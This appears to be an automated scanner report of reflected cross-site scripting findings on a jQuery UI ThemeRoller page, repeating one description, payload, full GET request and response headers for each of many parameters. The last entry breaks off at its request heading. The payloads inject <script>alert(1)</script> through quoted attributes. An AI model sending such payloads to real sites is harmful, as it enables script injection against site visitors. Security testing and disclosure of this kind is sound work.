The value of the bgImgOpacityHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16ebb"><script>alert(1)</script>14f1893d8d7 was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=7516ebb"><script>alert(1)</script>14f1893d8d7&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:30 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the bgImgOpacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bcf0"><script>alert(1)</script>b47e37778d5 was submitted in the bgImgOpacityOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=04bcf0"><script>alert(1)</script>b47e37778d5&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:30:00 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the bgImgOpacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2940e"><script>alert(1)</script>bb65b2d20eb was submitted in the bgImgOpacityShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=02940e"><script>alert(1)</script>bb65b2d20eb&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:30:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the bgTextureActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 230d2"><script>alert(1)</script>ddcbe0b8022 was submitted in the bgTextureActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png230d2"><script>alert(1)</script>ddcbe0b8022&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:35 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120001
The value of the bgTextureContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 668dd"><script>alert(1)</script>346464947ea was submitted in the bgTextureContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png668dd"><script>alert(1)</script>346464947ea&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:08 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120001
The value of the bgTextureDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9503"><script>alert(1)</script>a459dcc6533 was submitted in the bgTextureDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.pngb9503"><script>alert(1)</script>a459dcc6533&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:22 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120001
The value of the bgTextureError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b47ff"><script>alert(1)</script>ce132596418 was submitted in the bgTextureError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.pngb47ff"><script>alert(1)</script>ce132596418&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120001
The value of the bgTextureHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a07fc"><script>alert(1)</script>513a07b8f38 was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.pnga07fc"><script>alert(1)</script>513a07b8f38&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120001
The value of the bgTextureHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94c1f"><script>alert(1)</script>2d0e22689aa was submitted in the bgTextureHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png94c1f"><script>alert(1)</script>2d0e22689aa&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120001
The value of the bgTextureHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86eda"><script>alert(1)</script>c73d4e689a0 was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png86eda"><script>alert(1)</script>c73d4e689a0&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120001
The value of the bgTextureOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ded2"><script>alert(1)</script>40818f3f47c was submitted in the bgTextureOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png3ded2"><script>alert(1)</script>40818f3f47c&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:59 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120001
The value of the bgTextureShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1acac"><script>alert(1)</script>4c0c01413e6 was submitted in the bgTextureShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png1acac"><script>alert(1)</script>4c0c01413e6&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:30:04 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120001
The value of the borderColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d112"><script>alert(1)</script>4fec38c0b08 was submitted in the borderColorActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa5d112"><script>alert(1)</script>4fec38c0b08&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:38 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2f4e"><script>alert(1)</script>5a653707aec was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
